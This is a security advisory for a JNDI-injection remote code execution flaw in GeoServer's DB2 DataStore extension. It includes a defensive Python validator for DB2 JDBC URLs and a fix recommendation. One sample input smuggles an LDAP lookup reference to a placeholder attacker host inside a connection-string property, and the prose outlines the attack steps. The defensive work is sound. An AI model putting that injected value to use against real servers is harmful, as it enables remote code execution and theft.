EXECUTIVE SUMMARY:
CVE-2025-27511, with a CVSS score of 7.2, is a remote code execution flaw affecting the GeoServer DB2 DataStore extension (maven/org.geoserver.extension:gs-db2) in all releases prior to version 2.27.0. The vulnerability arises from the extension’s handling of DB2 JDBC connection strings, which allow unrestricted JNDI lookup parameters that are deserialized without validation. An attacker who has authenticated access to the GeoServer administrative interface can navigate to the Vector Data Sources page, create a new data store, and supply a maliciously crafted DB2 JDBC URL containing a JNDI reference to an attacker‑controlled LDAP server; the server then performs the JNDI lookup, deserializes the untrusted object, and executes arbitrary code supplied by the attacker. Successful exploitation grants the attacker full command‑execution privileges on the host running GeoServer, enabling data theft, service disruption, or further lateral movement within the network. Exploitation requires the DB2 extension to be installed, the vulnerable version to be in use, and a user account with rights to configure data stores; without these conditions, the attack vector is not viable.
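The weakness described above is a connection string that is passed to the driver without being checked for lookup references. The following validator, an added example and not code from GeoServer or the DB2 extension, shows the defensive check a data-store form should apply before a DB2 JDBC URL reaches the driver: strict syntax for host, port and database name, an allowlist of property keys, and rejection of any embedded URI scheme. The property allowlist, the sample URLs and the property name in the rejected sample are constructed placeholders.

```python
import re

# Constructed allowlist for this example: the DB2 JDBC properties a data-store
# editor may set. GeoServer's real extension does not define this list.
ALLOWED_PROPERTIES = {"user", "currentSchema", "sslConnection", "loginTimeout"}
SCHEME_RE = re.compile(r"[a-z][a-z0-9+.-]*://", re.IGNORECASE)  # ldap://, rmi://, ...
HOST_RE = re.compile(r"^[A-Za-z0-9.-]+$")
NAME_RE = re.compile(r"^[A-Za-z0-9_]+$")

def validate_db2_jdbc_url(url: str) -> list[str]:
    """Return findings for a submitted DB2 JDBC URL; an empty list means it passes.

    The IBM driver URL form is jdbc:db2://host:port/database:prop=value;prop=value;
    Every component is checked against a strict syntax, and any embedded URI
    scheme anywhere in the string is rejected so a JNDI lookup reference cannot
    ride along in a property value.
    """
    findings: list[str] = []
    prefix = "jdbc:db2://"
    if not url.startswith(prefix):
        return ["not a jdbc:db2:// URL"]
    body = url[len(prefix):]
    if SCHEME_RE.search(body):
        findings.append("embedded URI scheme in connection string")
    hostport, _, rest = body.partition("/")
    host, _, port = hostport.partition(":")
    if not HOST_RE.match(host):
        findings.append(f"unexpected host syntax: {host!r}")
    if port and not port.isdigit():
        findings.append(f"non-numeric port: {port!r}")
    database, _, props = rest.partition(":")
    if not NAME_RE.match(database):
        findings.append(f"unexpected database name: {database!r}")
    for item in filter(None, props.split(";")):
        key, _, _value = item.partition("=")
        if key not in ALLOWED_PROPERTIES:
            findings.append(f"property not on allowlist: {key!r}")
    return findings

# Constructed sample inputs: a normal data-store URL and one carrying a lookup
# reference in a property value (property name and host are placeholders).
GOOD_URL = "jdbc:db2://db2.example.internal:50000/GEO:user=geoserver;sslConnection=true;"
BAD_URL = "jdbc:db2://db2.example.internal:50000/GEO:someProperty=ldap://attacker.invalid/obj;"

if __name__ == "__main__":
    for candidate in (GOOD_URL, BAD_URL):
        print(candidate, "->", validate_db2_jdbc_url(candidate) or "ok")
```

The check is deliberately an allowlist rather than a denylist of scheme names, so a property key or value shape the form does not expect is rejected even if it carries no recognisable lookup prefix.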
RECOMMENDATION:
Upgrade the GeoServer DB2 DataStore extension to version 2.27.0 or later. Until the upgrade is applied, limit the accounts that can configure data stores to trusted administrators, since that right is a precondition for exploitation.
REFERENCES:
The following reports contain further technical details:
https://github.com/advisories/GHSA-g628-r368-6vh7